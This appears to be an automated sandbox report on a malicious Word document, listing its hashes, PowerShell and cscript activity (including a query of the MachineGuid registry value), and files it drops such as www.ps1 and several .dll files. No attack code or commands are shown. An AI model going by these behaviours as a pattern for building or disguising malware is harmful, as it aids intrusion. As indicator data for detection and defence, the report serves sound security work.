Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	528758
Product:	CloudBasic
Start time:	18:38:30
Start date:	25.11.2021
Sample:	sample.doc.vir
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	6be56f977b6692fb6ce5f94e110664e3
SHA1:	f4d5ce35c656e0f156a2ced453a964faabef09fb
SHA256:	ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
Filetype:	Microsoft Word document (32009/1) 35.95%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\www1.dll	HTML document, ASCII text, with very long lines	EA2597342C982B12B68284EDBED9731C	AFFB0B67308FA3D3CE363653C40915E054D398E3	654876EDD695BA8A02D4BF9EF07DA9137265B40C29A45F63DB66781C497914B1
C:\ProgramData\www3.dll	HTML document, UTF-8 Unicode text, with CRLF line terminators	6AA676D74FD9026D8636C06E27E0509B	F6C84C972FD7C3EC6B17A21928091C5C0742901C	EEB31BA843E10D248144DF0E76F53AB79FF33891511FAB466C83CD049BB1E337
C:\ProgramData\www4.dll	HTML document, ASCII text, with very long lines	06303A16F4C1C5F397F693020EB0765E	D2D3C7274B99534C64B91EB1DBC3A49BF40A6F9E	9AC2755720E7F4BD49F21D18AD7E20149762D778DE6708C6E0819493A84B033D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp	Composite Document File V2 Document, Cannot read section info	7702C90FF5098D859FE4837B13137777	A02C1E38674E1D263EE1B696F94632950F8FF8EF	EC8650D2C13AC25176D9B119BEBF5CB2CCA3B861FDF3BA495D1FD385BF1AB928
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	8BCBE128B5CFEDC8168306182B5B3502	39AF9B55FF487DDFF2349879D0D343E38C84A0D8	FA8CE7BAB40FA8F89B697A3C594FB1E72E38B02222F27870F15805ED715808DA
C:\Users\user\AppData\Local\Temp\~DF17CD00BA0C1E5190.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP	Composite Document File V2 Document, Cannot read section info	FADEECDED6606EF2CE4624D10A841716	AE9C759BB2F2A266C4DBFC165665BF06DE276800	B287A49EA96FBD5D2018F1AB8C4DD9F320DF49B0E553C71D36CB305A308C8DA5
C:\Users\user\AppData\Local\Temp\~DF591C17C8C82AFF5A.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP	Composite Document File V2 Document, Cannot read section info	151411F0596334D8B52C591FC2B37F5F	985C893366FEBC507C4CD4A56B3F8E91572E53E0	CA6A8AAD87E472007800AE97C6A32491B6D3C657931BEA7381DFB083B94DF40E
C:\Users\user\AppData\Local\Temp\~DFE56B344EF3200177.TMP	Composite Document File V2 Document, Cannot read section info	0EE6ED61BF1B98BEC33CB471FFC90224	9BC4A8290C1ACB0568E93D6B11ED64A6B94B33CB	EEF36474CA9F2D98514E630E2691FA340D5F02012337D51E96881BC917A4C320
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	C77D8A0B970AA8CD5E9C8A2A633D2017	2D08EBEA4F4B15E71BAB05A2AD2B3F5C58554277	8BF29712207B789BA72E60B7DBEC5A07AE731C254B696D763A6776BF7FCC88B1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample.doc.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 01:39:16 2021, mtime=Fri Nov 26 01:39:16 2021, atime=Fri Nov 26 01:39:20 2021, length=229888, window=hide	24990F42BF960D1887DAD884A503A870	DBB358E40600F9D5548C8A12C27B55F1F665906E	289E7A949FF16F4EFDA52D5D849A02006DB6EE79000DBEFAAFC0A48C40749DAB
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	5E14B167E03C155C1114041459FB27ED	011646BD83E9DC58E812E4BF20405944F1647979	4FDF16FA08416536D6B952F47B8AB04BAFED7000C25EB064BD44305026E21140
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CDOKOHSTDD9BH9UY8W35.temp	data	5E14B167E03C155C1114041459FB27ED	011646BD83E9DC58E812E4BF20405944F1647979	4FDF16FA08416536D6B952F47B8AB04BAFED7000C25EB064BD44305026E21140
C:\Users\user\AppData\Roaming\www.ps1	ASCII text, with CRLF line terminators	2311EE4F9DE83188EF324AB2ACF84CB4	0A38AF25D5319830C05A862FEEAA1E75F52D2969	6221BB6E0CBB8160161DE0B384FAA6124BD43FA985C16597BDEE6DEB4FDAC3C7
C:\Users\user\AppData\Roaming\www.txt	ASCII text, with CRLF line terminators	9C47EAA0A6D17B58D4BB72912DDD12EB	86A198833BA77CABEA2923D6F6DF3499109C4524	29757901313239CEFC88C9075793064D0CDC956B373792949582C97E5115D508
C:\Users\user\Desktop\~$mple.doc.doc	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6

Windows Analysis Report sample.doc.vir

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs